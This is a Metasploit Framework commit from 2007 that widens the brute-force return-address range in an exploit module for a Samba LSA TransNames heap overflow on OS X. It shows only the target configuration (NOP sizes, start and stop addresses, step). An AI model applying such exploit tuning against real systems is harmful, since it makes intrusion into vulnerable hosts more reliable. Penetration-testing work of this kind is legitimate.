Increase the brute force range (thanks toto_)

git-svn-id: file:///home/svn/framework3/trunk@5032 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-07-05 15:12:02 +00:00
parent 735c0b5d4e
commit febc0feb28
1 changed files with 2 additions and 2 deletions

View File

@ -55,7 +55,7 @@ class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote
'Nops' => 4 * 1024,
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x0181c000 },
'Start' => { 'Ret' => 0x01813000 },
'Stop' => { 'Ret' => 0x01820000 },
'Step' => 256,
},
@ -74,7 +74,7 @@ class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote
'Nops' => 1600,
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x0181c000 },
'Start' => { 'Ret' => 0x01813000 },
'Stop' => { 'Ret' => 0x01830000 },
'Step' => 796,
}